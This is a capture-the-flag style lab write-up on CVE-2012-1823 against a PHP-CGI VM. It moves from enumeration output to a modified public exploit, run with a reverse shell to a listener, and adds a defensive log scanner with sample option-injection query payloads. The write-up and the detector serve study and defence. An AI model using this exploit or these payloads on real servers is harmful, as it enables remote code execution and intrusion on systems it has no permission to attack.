VulnHub Pentester Lab: CVE-2012-1823: PHP CGI (notes)
Pentester Lab: CVE-2012-1823: PHP CGI
Booted as a live image. I won't go all the way to root.
Service enumeration
# nmap -p- 10.10.10.16
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 09:50 EDT
Nmap scan report for 10.10.10.16
Host is up (0.00042s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:F0:F2:A0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 22.42 seconds

# nmap -p22,80 -sV 10.10.10.16
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 09:51 EDT
Nmap scan report for 10.10.10.16
Host is up (0.00064s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.5p1 Debian 6+squeeze1 (protocol 2.0)
80/tcp open http Apache httpd 2.2.16 ((Debian))
MAC Address: 08:00:27:F0:F2:A0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.04 seconds
Points of interest
- [port 22] ssh OpenSSH 5.5p1 Debian 6+squeeze1 (protocol 2.0)
- [port 80] http Apache httpd 2.2.16 (Debian)
I probably don't need to go after SSH at all.
Details
Nothing notable turned up for SSH, so I'll ignore it.
[port 80] http Apache httpd 2.2.16 (Debian)
# nikto -h 10.10.10.16
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.16
+ Target Hostname: 10.10.10.16
+ Target Port: 80
+ Start Time: 2020-05-18 10:00:47 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.16 (Debian)
+ Retrieved x-powered-by header: PHP/5.3.3-7+squeeze8
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /favicon.ico, inode: 5997, size: 1150, mtime: Thu May 3 22:02:34 2012
+ Apache/2.2.16 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7864 requests: 1 error(s) and 15 item(s) reported on remote host
+ End Time: 2020-05-18 10:01:59 (GMT-4) (72 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# gobuster dir -u http://10.10.10.16/ -w /usr/share/wordlists/dirb/common.txt -q -e
http://10.10.10.16/.htpasswd (Status: 403)
http://10.10.10.16/.hta (Status: 403)
http://10.10.10.16/.htaccess (Status: 403)
http://10.10.10.16/all (Status: 200)
http://10.10.10.16/favicon.ico (Status: 200)
http://10.10.10.16/index.php (Status: 200)
http://10.10.10.16/index (Status: 200)
http://10.10.10.16/patch (Status: 200)
http://10.10.10.16/server-status (Status: 403)
I switched over to gobuster.
At a glance, nothing stands out.
Checking for exploits,
# searchsploit apache 2.2.
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title | Path
------------------------------------------------------------------------------------ ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py
this is what comes up.
When this worked for me before, I seem to recall it needed "/cgi-bin/" to exist, though.
This appears to be what corresponds to CVE-2012-1823.
Let's try it.
# searchsploit -m 29290 29316
But neither one worked.
Of course, there's no point in making it request "/cgi-bin/" when that directory doesn't exist.
Maybe it'll work if I assume CGI is running in the same directory as "server-status"?
I tweaked the array of target paths in 29290.c (around line 373):
interpreters[0] = strdup("/cgi-bin/php");
interpreters[1] = strdup("/cgi-bin/php5");
interpreters[2] = strdup("/cgi-bin/php-cgi");
interpreters[3] = strdup("/cgi-bin/php.cgi");
interpreters[4] = strdup(""); // changed here
Running it after that,
# ./exploit --target 10.10.10.16 --port 80 --protocol http --reverse-ip 10.10.10.3 --reverse-port 8080
it came back to the nc listener I had waiting on port 8080!
Got a shell!
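As an added defensive check (not part of the original writeup or of the exploit it uses), the script below scans Apache access-log lines for requests that php-cgi would have parsed as command-line options, the condition behind CVE-2012-1823, and it deliberately ignores the request path, since the box above answered at "/" rather than under "/cgi-bin/". The log lines are constructed samples, and the check mirrors the condition the mod_rewrite workaround published with the PHP advisory matched on: a query string with no "=" that still contains a "-" (possibly encoded as "%2d").

```python
import re
from urllib.parse import unquote

# Apache combined-log request line; only the fields the check needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def php_cgi_argv(raw_query):
    """Return the argv php-cgi would build from this query string, or None if harmless.

    php-cgi only treats the query string as command-line options when it holds no
    literal '='; it splits on '+' and percent-decodes each piece afterwards, so
    '%3d' and '%2d' can hide '=' and '-' from a filter that looks at the raw string.
    """
    if not raw_query or "=" in raw_query:
        return None
    argv = [unquote(piece) for piece in raw_query.split("+") if piece]
    return argv if any(arg.startswith("-") for arg in argv) else None

def scan_access_log(lines):
    """Return (ip, path, argv, status) for every request that would have reached
    php-cgi as options, whatever the path: the lab box answered at '/', not /cgi-bin/."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        argv = php_cgi_argv(query)
        if argv is not None:
            hits.append((m.group("ip"), path, argv, int(m.group("status"))))
    return hits

# Constructed sample log lines (not taken from the lab machine); the addresses
# from the writeup are reused only as labels.
SAMPLE_LOG = """\
10.10.10.3 - - [18/May/2020:10:05:12 -0400] "GET / HTTP/1.1" 200 1345 "-" "curl/7.68.0"
10.10.10.3 - - [18/May/2020:10:05:13 -0400] "GET /index.php?page=2 HTTP/1.1" 200 1345 "-" "-"
10.10.10.3 - - [18/May/2020:10:05:14 -0400] "GET /?-s HTTP/1.1" 200 4096 "-" "-"
10.10.10.3 - - [18/May/2020:10:05:15 -0400] "GET /cgi-bin/php?-s HTTP/1.1" 404 289 "-" "-"
10.10.10.3 - - [18/May/2020:10:05:16 -0400] "GET /?%2dd+display_errors%3d1 HTTP/1.1" 200 512 "-" "-"
10.10.10.3 - - [18/May/2020:10:05:17 -0400] "GET /search?q=-s HTTP/1.1" 200 100 "-" "-"
""".splitlines()

if __name__ == "__main__":
    for ip, path, argv, status in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {path} argv={argv} status={status}")
```

The 404 against /cgi-bin/php and the 200 against / are the point of the writeup: a rule keyed only on the /cgi-bin/ prefix would have missed the request that actually succeeded.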
After getting the shell
I treat the Pentester Lab series as material for studying vulnerabilities, so I don't go for root.
Wrap-up
- The earlier time, when cgi-bin looked like it should work but didn't, it was most likely also down to the target path.